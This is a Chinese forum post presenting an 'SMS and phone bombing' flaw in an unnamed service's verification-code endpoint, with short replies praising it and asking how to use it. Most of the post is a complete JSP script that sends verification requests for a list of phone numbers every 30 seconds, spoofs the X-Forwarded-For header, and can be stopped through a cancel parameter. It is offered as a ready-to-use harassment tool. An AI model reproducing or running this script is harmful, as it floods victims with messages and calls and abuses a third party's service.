某XXX短信和电话轰炸漏洞

admin

某XXX短信验证码未做次数和安全校验漏洞，每请求一次便会自动发一封短信而且打一个电话。
利用代码：

1. 
   
2. <%@ page language="java" pageEncoding="UTF-8"%>
   
3. <%@ page isThreadSafe="false" %>
   
4. <%@ page import="java.io.OutputStreamWriter"%>
   
5. <%@ page import="java.net.URLConnection"%>
   
6. <%@ page import="java.net.URL"%>
   
7. <%@ page import="java.util.*"%>
   
8. <%!
   
9.     private static Timer t = new Timer();
   
10.     void test(){
    
11.       String[] str = "1321344xxx,134555455xxxx".split(",");//手机号,分开
    
12.       for(String s:str){
    
13.       try{
    
14.       URLConnection u = new URL("http://www.kuaidadi.com/phone/api.php").openConnection();
    
15.       u.setDoInput(true);
    
16.       u.setDoOutput(true);
    
17.       u.setConnectTimeout(3000);
    
18.       u.setReadTimeout(3000);
    
19.       u.setRequestProperty("x-forwarded-for", "12.34.12.34");
    
20.       OutputStreamWriter osw = new OutputStreamWriter(u.getOutputStream(), "UTF-8");
    
21.       osw.write("mobile="+s+"&act=get_verify_code&sourceid=11");
    
22.       osw.flush();
    
23.       osw.close();
    
24.       u.getOutputStream();
    
25.       u.getInputStream();
    
26.       }catch(Exception e){
    
27.       }
    
28.       }
    
29.     }
    
30.    
    
31.     void startX(){
    
32.       t.schedule(new java.util.TimerTask() {
    
33.       public void run() {
    
34.       test();
    
35.       }
    
36.       }, 0, 30000);
    
37.     }
    
38. %>
    
39. <%
    
40.     try{
    
41.       if("cancel".equals(request.getParameter("action"))){
    
42.       t.cancel();
    
43.       out.println("stop....");
    
44.       }else{
    
45.       t = new Timer();
    
46.       startX();
    
47.       }
    
48.     }catch(Exception e){
    
49.       out.println(e.toString());
    
50.     }
    
51. %>

复制代码

如果想停止发送:http://www.xxx.cn/sm.jsp?action=cancel

好好 学习了 确实不错

没看完~~~~~~ 先顶，好同志

怎么使用啊